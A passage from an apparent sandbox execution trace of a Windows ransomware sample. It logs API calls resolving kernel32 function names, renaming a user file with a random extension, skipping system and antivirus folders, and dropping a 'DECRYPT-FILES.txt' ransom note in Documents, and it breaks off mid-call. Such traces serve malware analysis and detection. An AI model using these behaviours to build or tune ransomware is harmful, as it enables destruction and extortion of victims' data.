lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.660] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.660] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.660] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.660] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.660] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.660] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.660] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.660] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.660] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.660] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.660] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.660] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.660] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.660] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.661] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.661] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.661] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.661] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.661] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.661] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.661] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.661] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.661] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.661] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.661] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.661] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.661] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.661] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.661] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.661] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.661] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.661] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.661] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.662] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.662] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.662] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.662] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.662] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.662] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.662] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.662] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.662] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.662] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.662] lstrlenA (lpString="DELETEATOM") returned 10 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.662] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.662] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.662] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.662] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.662] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.662] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.662] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.662] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.663] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.663] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.663] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.663] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.663] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.663] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.663] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.663] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.663] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.663] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.663] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.663] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.663] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.663] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.663] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.663] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.663] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.663] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.664] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.664] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.664] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.664] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.664] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.664] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.664] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.664] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.664] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.664] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.664] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.664] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.664] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.664] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.664] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.664] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.664] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.665] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.665] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf") returned 48 [0083.665] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf.r84CZ") returned 54 [0083.665] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vy32gl.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf.r84CZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vy32gl.swf.r84cz"), dwFlags=0x0) returned 1 [0083.672] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.672] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.673] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.673] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8812a0, ftCreationTime.dwHighDateTime=0x1d4cb34, ftLastAccessTime.dwLowDateTime=0x564a2710, ftLastAccessTime.dwHighDateTime=0x1d4d441, ftLastWriteTime.dwLowDateTime=0x564a2710, ftLastWriteTime.dwHighDateTime=0x1d4d441, nFileSizeHigh=0x0, nFileSizeLow=0x18443, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY32Gl.swf", cAlternateFileName="")) returned 0 [0083.673] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0083.673] CloseHandle (hObject=0x430) returned 1 [0083.673] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x87bc8e70, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x87bc8e70, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0083.673] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0083.673] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0083.673] lstrcatW (in: lpString1="Documents", lpString2="\\" | out: lpString1="Documents\\") returned="Documents\\" [0083.673] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Program Files") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch=":\\Windows") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Games\\") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Tor Browser\\") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\ProgramData\\") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\All Users") returned 0x0 [0083.673] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\IETldCache\\") returned 0x0 [0083.674] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\Local Settings\\") returned 0x0 [0083.674] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="\\AppData\\Local") returned 0x0 [0083.674] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="AhnLab") returned 0x0 [0083.674] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0083.674] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.674] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.674] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\jkbimi8.tmp") returned 52 [0083.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0083.674] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.674] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0083.674] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\DECRYPT-FILES.txt") returned 58 [0083.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0083.675] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0083.676] CloseHandle (hObject=0x434) returned 1 [0083.676] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.676] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0083.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xae10b880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae10b880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0083.676] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.676] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xae10b880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae10b880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.676] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.676] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.676] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5401890, ftCreationTime.dwHighDateTime=0x1d560ed, ftLastAccessTime.dwLowDateTime=0x4b6d4640, ftLastAccessTime.dwHighDateTime=0x1d52b23, ftLastWriteTime.dwLowDateTime=0x4b6d4640, ftLastWriteTime.dwHighDateTime=0x1d52b23, nFileSizeHigh=0x0, nFileSizeLow=0x1891, dwReserved0=0x0, dwReserved1=0x0, cFileName="-keodEgSHy.xlsx", cAlternateFileName="-KEODE~1.XLS")) returned 1 [0083.676] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="DECRYPT-FILES.txt") returned 1 [0083.676] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="autorun.inf") returned 1 [0083.676] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="boot.ini") returned 1 [0083.676] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="desktop.ini") returned 1 [0083.676] lstrcmpiW 